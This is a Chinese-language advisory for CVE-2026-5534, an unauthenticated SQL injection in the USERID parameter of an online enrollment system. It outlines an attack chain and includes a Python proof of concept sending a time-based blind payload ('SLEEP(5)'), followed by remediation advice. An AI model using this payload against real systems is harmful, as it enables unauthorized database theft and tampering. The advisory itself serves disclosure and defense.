CVE-2026-5534 itsourcecode在线报名系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-5534

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Online Enrollment System

漏洞概述

itsourcecode Online Enrollment System 1.0 版本存在严重的 SQL 注入漏洞。该漏洞源于 /sms/user/index.php 文件中参数处理组件对 USERID 参数的过滤不当。未经身份验证的远程攻击者可通过操纵该参数注入恶意 SQL 语句，从而窃取数据库敏感信息或破坏数据完整性。鉴于漏洞利用代码已公开，建议尽快修复。

技术细节

该漏洞属于典型的 SQL 注入漏洞，其根本原因在于 itsourcecode Online Enrollment System 在处理用户输入时缺乏安全编码规范。具体而言，在 /sms/user/index.php?view=edit&id=10 接口中，后端代码直接获取前端传递的 USERID 参数，并将其拼接到 SQL 查询语句中执行，未使用预编译语句或进行有效的特殊字符转义。攻击者可以通过修改 HTTP 请求中的 USERID 参数值，注入单引号闭合原查询语句，进而拼接 Union Select 或 Boolean Based 等恶意 SQL Payload。由于 CVSS 评分显示无需身份验证（PR:N）且通过网络发起攻击（AV:N），攻击者可通过自动化工具批量扫描并利用此漏洞，导致数据库中的用户数据被窃取、篡改或删除，严重威胁系统的机密性、完整性和可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标网络，识别运行 itsourcecode Online Enrollment System 的服务器。

STEP 2

2. 漏洞探测

攻击者向 /sms/user/index.php?view=edit&id=10 发送带有恶意 Payload 的 USERID 参数，测试是否存在 SQL 注入。

STEP 3

3. 漏洞利用

确认漏洞存在后，攻击者利用 SQL 注入语法（如 UNION SELECT）提取数据库结构、表名及敏感数据。

STEP 4

4. 数据窃取与破坏

攻击者导出用户凭据或其他敏感信息，或通过注入语句修改/删除数据库内容，破坏业务连续性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli_vulnerability(target_url):
    """
    Basic PoC to check for SQL Injection in CVE-2026-5534.
    Target: /sms/user/index.php?view=edit&id=10
    Parameter: USERID
    """
    # Payload for time-based blind SQL injection
    payload = "1' AND SLEEP(5)-- -"
    
    params = {
        "view": "edit",
        "id": "10",
        "USERID": payload
    }
    
    try:
        response = requests.get(target_url, params=params, timeout=10)
        # If response takes longer than 5 seconds (plus network latency), sleep executed
        if response.elapsed.total_seconds() > 5:
            print("[+] Vulnerability Confirmed: SQL Injection exists in USERID parameter.")
            return True
        else:
            print("[-] Vulnerability not detected.")
            return False
    except Exception as e:
        print(f"[!] Error during request: {e}")
        return False

if __name__ == "__main__":
    target = "http://localhost/sms/user/index.php" # Replace with actual target
    check_sqli_vulnerability(target)

影响范围

itsourcecode Online Enrollment System 1.0

防御指南

临时缓解措施

建议立即检查并修改 /sms/user/index.php 文件的源代码，将基于字符串拼接的 SQL 查询改为参数化查询。在无法立即修复代码的情况下，应在系统前端或反向代理层部署 WAF 规则，针对 USERID 参数中的单引号、注释符（--）、特定 SQL 关键字（UNION, SELECT, SLEEP）进行过滤和拦截，暂时缓解攻击风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5534
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5534
3 Details https://www.cvedetails.com/cve/CVE-2026-5534/
4 VulDB https://vuldb.com/cve/CVE-2026-5534
5 Link https://github.com/ldan42008-ux/cve/issues/2
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/submit/782185
8 Link https://vuldb.com/vuln/355287
9 Link https://vuldb.com/vuln/355287/cti